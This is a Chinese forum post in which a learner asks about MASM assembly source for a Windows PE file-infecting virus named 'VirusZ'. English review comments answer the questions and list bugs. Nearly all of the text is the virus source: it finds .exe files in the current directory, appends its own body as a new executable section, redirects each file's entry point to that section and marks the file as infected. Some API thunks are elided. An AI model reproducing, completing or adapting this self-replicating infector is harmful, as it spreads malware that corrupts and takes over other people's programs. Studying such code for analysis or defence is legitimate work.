小弟代码中有3处不懂,请高手指点(pe文件相关)
问题所在已在代码中以“问题1”“问题2”“问题3”的注释标出（原帖用红色标记，纯文本中颜色已丢失）
小弟基础不好,可能问题比较傻,高手别笑话,先谢谢了
---------------------------------------------------
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\gdi32.lib
.data ; host (first-generation carrier) data: the two MessageBox strings
MsgTitle db "Caution!", 0h   ; lpCaption
Msg db "VirusZ OK!", 0h      ; lpText
.code
; main_start -- the benign host program carried by the first generation.
; It is NOT the linked entry point (see `end virus_start` at the bottom of the
; file): the virus body runs first and transfers here through Ret_Entry, which
; on the first generation is hard-wired to 401000h in virus_start, i.e. this
; label is assumed to be the first byte of .code at the default ImageBase
; 400000h -- check the map file if the layout changes.
; MessageBox(hWnd = NULL, lpText = Msg, lpCaption = MsgTitle, uType = MB_OK):
; stdcall, so the arguments are pushed right to left.
; NOTE(review): MessageBox is exported by user32.dll; only kernel32.lib and
; gdi32.lib appear in the includelib lines above -- the user32 include/
; includelib is presumably earlier in the original file, otherwise the link
; fails.
main_start:
push MB_OK            ; uType
push offset MsgTitle  ; lpCaption
push offset Msg       ; lpText
push NULL             ; hWnd
call MessageBox
push 0h               ; uExitCode
call ExitProcess      ; never returns
VirusZ segment
virus_start:
; Entry point of the virus body (and of the linked first-generation binary,
; see `end virus_start`). Once appended to another PE as a new section the body
; runs at an address unknown at link time, so every data reference below goes
; through ebp = (run-time address of get_offset) - (link-time address of
; get_offset): the classic call/pop delta-offset trick. ebp is never restored,
; so the host entry point is later entered with ebp (and eax/ecx/edx/esi/edi)
; clobbered.
call get_offset
get_offset:
pop ebp                          ; ebp = run-time address of get_offset
sub ebp, offset get_offset       ; ebp = relocation delta (0 when the first generation loads at its link-time base)
; First generation: Ori_Entry is still 0 in the image, so default it to
; 401000h, the assumed VA of main_start. An infected host instead carries the
; absolute VA of its original entry point, stored by infect_file.
cmp Ori_Entry[ebp], 0h
jnz save_entry
mov Ori_Entry[ebp], 401000h
save_entry:
; Ori_Entry is overwritten for every victim inside infect_file, so keep this
; host's own return address in Ret_Entry for the final `ret` in end_find.
push Ori_Entry[ebp]
pop Ret_Entry[ebp]
; FindFirstFile("*.exe", &FindData): enumerate .exe files in the current
; directory only. Returns INVALID_HANDLE_VALUE on failure.
lea eax, FindData[ebp]
push eax                         ; lpFindFileData
lea eax, FindFile[ebp]
push eax                         ; lpFileName
call ZFindFirstFile ; thunk to a hard-coded kernel32 address (see ZCreateFile)
cmp eax, INVALID_HANDLE_VALUE
jz end_find ; no match or no access: go straight to the host
mov FindHandle[ebp], eax
call infect_file ; try the first match
find_next:
; FindNextFile(FindHandle, &FindData) until it returns FALSE.
lea eax, FindData[ebp]
push eax                         ; lpFindFileData
push FindHandle[ebp]             ; hFindFile
call ZFindNextFile ;
cmp eax, FALSE
jz end_find ; enumeration exhausted (or failed): clean up and run the host
call infect_file ;
jmp find_next
infect_file:
; infect_file -- append the virus body to the file named in FindData.cFileName
; as a new, last section and point AddressOfEntryPoint at it.
; In:  ebp = delta offset; FindData filled by FindFirstFile/FindNextFile.
; Out: nothing. On any failure the file is closed (if it was opened) and the
;      routine returns; the error labels all share one exit path.
; Clobbers eax, ecx, edx, esi, edi and the Ori_Entry/NewSection/... variables.
; Assumptions that the code does NOT verify (see the answers to questions 1-3
; below): a 32-bit PE (PE32 optional header of 0E0h bytes), at most 15
; existing sections, no data after the last section, image loaded at ImageBase.
;
; CreateFile(cFileName, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE,
;            NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL) -- pushed right to left.
push 0h                                  ; hTemplateFile
push FILE_ATTRIBUTE_NORMAL               ; dwFlagsAndAttributes
push OPEN_EXISTING                       ; dwCreationDisposition
push 0h                                  ; lpSecurityAttributes
push FILE_SHARE_READ + FILE_SHARE_WRITE  ; dwShareMode
push GENERIC_READ + GENERIC_WRITE        ; dwDesiredAccess
lea eax, FindData[ebp].cFileName
push eax                                 ; lpFileName (relative to the current directory)
call ZCreateFile ;
cmp eax, INVALID_HANDLE_VALUE
jz create_err                            ; read-only or in-use files (e.g. the running host) end up here
mov OpenHandle[ebp], eax
; SetFilePointer(h, 3Ch, NULL, FILE_BEGIN): seek to IMAGE_DOS_HEADER.e_lfanew.
; The return value is never checked (setpointer_err below is unreachable) and
; the MZ signature is not checked either.
push FILE_BEGIN
push 0h
push 3ch
push OpenHandle[ebp]
call ZSetFilePointer ;
; ReadFile(h, &PEAddress, 4, &ReadCount, NULL): PEAddress = e_lfanew.
push 0h                                  ; lpOverlapped
lea eax, ReadCount[ebp]
push eax                                 ; lpNumberOfBytesRead
push 4h                                  ; nNumberOfBytesToRead
lea eax, PEAddress[ebp]
push eax                                 ; lpBuffer
push OpenHandle[ebp]
call ZReadFile ;
cmp eax, 0h
jz read_err
; NOTE(review): only the BOOL result is tested, never ReadCount. A read at or
; past EOF succeeds with 0 bytes, so a too-short file leaves PEAddress (and
; below, PEHead) holding the previous victim's values and the signature test
; then passes on stale data. e_lfanew is not bounds-checked either.
; Seek to the PE header.
push FILE_BEGIN
push 0h
push PEAddress[ebp]
push OpenHandle[ebp]
call ZSetFilePointer ;
mov HeadLength[ebp], sizeof PEHead + sizeof SectionTable ; 0F8h + 280h = 378h bytes
; Question 1 (from the post): is sizeof PEHead fixed, and does it match the
; header size of the file being infected?
; Answer: it is fixed -- `sizeof` is evaluated by the assembler on the
; IMAGE_NT_HEADERS struct: 4-byte Signature + 20-byte IMAGE_FILE_HEADER +
; 224-byte (0E0h) IMAGE_OPTIONAL_HEADER32 = 0F8h. The file's own optional-
; header length is FileHeader.SizeOfOptionalHeader, and its section table
; begins at e_lfanew + 18h + SizeOfOptionalHeader. The two agree only when
; that field is 0E0h (the usual PE32 case); nothing here verifies it.
; Question 2: why is SectionTable defined as 280h bytes -- is the section
; table a fixed size?
; Answer: no. 280h = 16 * 28h is only the size of this buffer: room for 16
; IMAGE_SECTION_HEADERs. The real count is FileHeader.NumberOfSections and
; the code indexes the buffer with it. PEHead and SectionTable are filled by
; the single ReadFile below, which is why they must stay adjacent in the data
; area.
push 0h                                  ; lpOverlapped
lea eax, ReadCount[ebp]
push eax                                 ; lpNumberOfBytesRead
push HeadLength[ebp]                     ; nNumberOfBytesToRead
lea eax, PEHead[ebp] ; (1) NT headers plus up to 16 section headers in one read
push eax                                 ; lpBuffer
push OpenHandle[ebp]
call ZReadFile ;
cmp eax, 0h
jz read_err
cmp DWORD ptr PEHead[ebp].Signature, IMAGE_NT_SIGNATURE ; "PE\0\0"?
jnz end_modify
; Infection marker: the WORD at NT-header offset 1Ah is
; OptionalHeader.MajorLinkerVersion/MinorLinkerVersion. 0C05h (major 5,
; minor 12) means "already infected"; it is stamped further below.
cmp WORD ptr PEHead[ebp + 1ah], 0C05h ;
jz end_modify
; Remember the victim's original entry as an absolute VA (RVA + ImageBase).
; The value travels inside the copied body and is what the infected host
; returns to in end_find; it assumes the image is loaded at ImageBase.
mov eax, PEHead[ebp].OptionalHeader.AddressOfEntryPoint
add eax, PEHead[ebp].OptionalHeader.ImageBase
mov Ori_Entry[ebp], eax ;
mov eax, sizeof PEHead ; Question 3: see the answer below
; Question 3 (from the post): can this be read as "the buffer was filled at
; (1), so sizeof PEHead is now the size of the real file's header"?
; Answer: no. sizeof is a compile-time constant (0F8h) and never depends on
; what ReadFile stored in the buffer. SectionAddress is therefore the section
; table offset relative to the NT header for a standard PE32 header only; the
; file's own value is 18h + FileHeader.SizeOfOptionalHeader.
mov SectionAddress[ebp], eax ;
mov VirusLength[ebp], offset virus_end - offset virus_start ; size of the body to append
; Room check: e_lfanew + section-table offset + (NumberOfSections+1)*28h must
; not exceed SizeOfHeaders, i.e. one more section header still fits in the
; file's header area without overlapping the first section's raw data.
; (`mul` clobbers edx; the compare is unsigned, hence `ja`.)
movzx eax, PEHead[ebp].FileHeader.NumberOfSections ;
inc eax
mov ecx, 28h
mul ecx ; eax = eax * ecx
add eax, SectionAddress[ebp]
add eax, PEAddress[ebp]
cmp eax, PEHead[ebp].OptionalHeader.SizeOfHeaders ;
ja end_modify
; edi = &SectionTable[NumberOfSections], the slot for the new header;
; [edi - 28h] is the current last section header.
; NOTE(review): the check above bounds the file's header area, not this
; buffer: with 16 or more sections edi runs past SectionTable (280h) into
; HeadLength/SectionAddress/... and the 28h-byte copy below corrupts them;
; with 0 sections [edi - 28h] reads the tail of PEHead instead of a header.
lea edi, SectionTable[ebp]
movzx eax, PEHead[ebp].FileHeader.NumberOfSections
mov ecx, 28h
mul ecx
add edi, eax
inc PEHead[ebp].FileHeader.NumberOfSections ; one more section (WORD increment)
; New section RVA = round_up(last.VirtualAddress + last.VirtualSize, SectionAlignment).
; IMAGE_SECTION_HEADER offsets used here: +8 VirtualSize, +0Ch VirtualAddress,
; +10h SizeOfRawData, +14h PointerToRawData.
; Rounding idiom used four times below: div / inc / mul. It relies on edx
; being 0 for `div` -- true only because the preceding `mul` left it 0 (high
; dword of a product that fits in 32 bits) -- and it always adds a full
; alignment unit, even when the value is already aligned.
mov eax, [edi - 28h + 8h] ;
add eax, [edi - 28h + 0ch] ;
mov ecx, PEHead[ebp].OptionalHeader.SectionAlignment ;
div ecx
inc eax
mul ecx
mov NewSection[ebp].VirtualAddress, eax ;
; SizeOfRawData = round_up(VirusLength, FileAlignment).
mov eax, VirusLength[ebp] ;
mov ecx, PEHead[ebp].OptionalHeader.FileAlignment ;
div ecx
inc eax
mul ecx
mov NewSection[ebp].RawSize, eax ;
mov eax, VirusLength[ebp] ;
mov NewSection[ebp].VirtualSize, eax ; VirtualSize = exact body length
; PointerToRawData = round_up(last.PointerToRawData + last.SizeOfRawData, FileAlignment):
; the body is written right after the last section's data. No EOF check is
; made, so anything stored after that point in the file (an overlay,
; certificates, ...) is overwritten, and the last header is assumed to be
; the last section in the file as well.
mov eax, [edi - 28h + 14h] ;
add eax, [edi - 28h + 10h] ;
mov ecx, PEHead[ebp].OptionalHeader.FileAlignment ;
div ecx
inc eax
mul ecx
mov NewSection[ebp].RawOffset, eax ;
; SizeOfImage = round_up(SizeOfImage + VirusLength, SectionAlignment).
mov eax, NewSection[ebp].VirtualSize ;
add eax, PEHead[ebp].OptionalHeader.SizeOfImage ;
mov ecx, PEHead[ebp].OptionalHeader.SectionAlignment ;
div ecx
inc eax
mul ecx
mov PEHead[ebp].OptionalHeader.SizeOfImage, eax ;
; Copy the 28h-byte NewSection template into the new slot (edi still points at it).
lea esi, NewSection[ebp]
mov ecx, 28h
rep movsb ;
; Redirect the entry point to the first byte of the new section (= virus_start)
; and stamp the infection marker.
mov eax, NewSection[ebp].VirtualAddress
mov PEHead[ebp].OptionalHeader.AddressOfEntryPoint, eax ;
mov WORD ptr PEHead[ebp + 1ah], 0C05h ;
; Write the modified headers back: HeadLength (378h) bytes at e_lfanew, the
; same span that was read at (1). If that read was short (file shorter than
; the span) the unread tail of the buffer -- zero, or stale from a previous
; victim -- is written out past the old end of file.
push FILE_BEGIN
push 0h
push PEAddress[ebp]
push OpenHandle[ebp]
call ZSetFilePointer ;
push 0h                                  ; lpOverlapped
lea eax, ReadCount[ebp]
push eax                                 ; lpNumberOfBytesWritten
push HeadLength[ebp]                     ; nNumberOfBytesToWrite
lea eax, PEHead[ebp]
push eax                                 ; lpBuffer
push OpenHandle[ebp]
call ZWriteFile ;
cmp eax, 0h
jz write_err
; Write the body: RawSize bytes starting at virus_start. RawSize > VirusLength,
; so the tail of the section is whatever follows virus_end in this process's
; memory. NOTE(review): if this write fails the headers are already on disk
; and the file is left pointing at a section that was never written.
push FILE_BEGIN
push 0h
push NewSection[ebp].RawOffset
push OpenHandle[ebp]
call ZSetFilePointer ;
push 0h                                  ; lpOverlapped
lea eax, ReadCount[ebp]
push eax                                 ; lpNumberOfBytesWritten
push NewSection[ebp].RawSize             ; nNumberOfBytesToWrite
lea eax, virus_start[ebp]
push eax                                 ; lpBuffer
push OpenHandle[ebp]
call ZWriteFile ;
cmp eax, 0h
jz write_err
end_modify: ; not a PE / already infected / no room: file left untouched
read_err:
write_err:
setpointer_err: ; never jumped to -- SetFilePointer results are not checked
push OpenHandle[ebp]
call ZCloseHandle ;
create_err: ; CreateFile failed: nothing to close
ret
end_find:
; FindClose(FindHandle), then transfer to the host's original entry point.
; `push VA / ret` is an indirect jump that needs no free register. The VA is
; 401000h (main_start) on the first generation and the absolute original
; entry saved by infect_file in an infected host. Registers are not restored.
; NOTE(review): this path is also taken when FindFirstFile failed, in which
; case FindHandle is whatever the body carried (0 in the first generation,
; stale otherwise) and FindClose is called on an invalid handle.
push FindHandle[ebp]
call ZFindClose ;
push Ret_Entry[ebp] ; original entry point VA
ret                 ; jump to the host
ZCreateFile:
; API thunks. Each one stores a hard-coded absolute address of a kernel32
; export and jumps to it, so the stdcall arguments pushed by the caller and
; the caller's return address are consumed by the API itself (no import
; table, no GetProcAddress). The addresses are valid for one specific
; kernel32.dll build only; on any other Windows build the jump lands
; somewhere else. The `.....` lines are the post's elision of the remaining
; thunks (presumably ZFindFirstFile, ZFindNextFile, ZSetFilePointer,
; ZReadFile, ZWriteFile, ZCloseHandle, which are all called above).
mov FunctionAddress[ebp], 77e5a837h ; CreateFileA in that build
jmp FunctionAddress[ebp]
.....
......
ZFindClose:
mov FunctionAddress[ebp], 77e58eaah ; FindClose in that build
jmp FunctionAddress[ebp]
;========================================== <
; Virus variables. They live inside the body, so they are copied into every
; victim with whatever values they hold at infection time, and the body's
; section must be writable (see SectionFlags).
Ret_Entry dd 0h              ; original entry VA of the running host (set in virus_start)
Ori_Entry dd 0h              ; original entry VA stored for the next victim; 0 in the first generation
FindFile db "*.exe", 0h      ; FindFirstFile pattern, current directory only
FindData WIN32_FIND_DATA <0> ; cFileName of the current match is used by infect_file
FindHandle dd 0h             ; FindFirstFile handle
OpenHandle dd 0h             ; CreateFile handle of the current victim
ReadCount dd 0h              ; bytes transferred by the last ReadFile/WriteFile (never validated)
PEAddress dd 0h              ; e_lfanew of the current victim
; PEHead and SectionTable are filled by ONE ReadFile of HeadLength bytes and
; therefore must stay adjacent: 0F8h bytes of IMAGE_NT_HEADERS (Signature +
; IMAGE_FILE_HEADER + IMAGE_OPTIONAL_HEADER32) followed by 280h = 16 * 28h
; bytes, i.e. room for 16 IMAGE_SECTION_HEADERs. The fields after them are
; what a victim with 16 or more sections overwrites (see infect_file).
PEHead IMAGE_NT_HEADERS <0>
SectionTable db 280h dup (0)
HeadLength dd 0h             ; sizeof PEHead + sizeof SectionTable = 378h
SectionAddress dd 0h         ; offset of the section table relative to the NT header (assumed 0F8h)
VirusLength dd 0h            ; virus_end - virus_start
FunctionAddress dd 0h        ; scratch for the Z* API thunks
; VirusZSection -- the IMAGE_SECTION_HEADER (28h bytes) that gets appended,
; with file-local field names. The offsets match the Win32 layout that the
; [edi - 28h + xx] accesses in infect_file rely on.
VirusZSection struc
SectionName db "VirusZ", 0h, 0h ; +00h Name[8]
VirtualSize dd 0h               ; +08h Misc.VirtualSize
VirtualAddress dd 0h            ; +0Ch VirtualAddress (RVA)
RawSize dd 0h                   ; +10h SizeOfRawData
RawOffset dd 0h                 ; +14h PointerToRawData
dd 0h, 0h, 0h                   ; +18h PointerToRelocations, +1Ch PointerToLinenumbers, +20h NumberOfRelocations/NumberOfLinenumbers
SectionFlags dd 0e0000020h      ; +24h Characteristics: IMAGE_SCN_CNT_CODE | MEM_EXECUTE | MEM_READ | MEM_WRITE (writable: the body stores its variables in itself)
VirusZSection ends
NewSection VirusZSection <>                  ; header template filled by infect_file, then copied into the victim's section table with rep movsb
VirusName db 0h, "VirusZ 1.0 by Zane", 0h ; signature string carried inside the body
virus_end: ; end of the copied body: VirusLength = virus_end - virus_start
VirusZ ends
end virus_start ;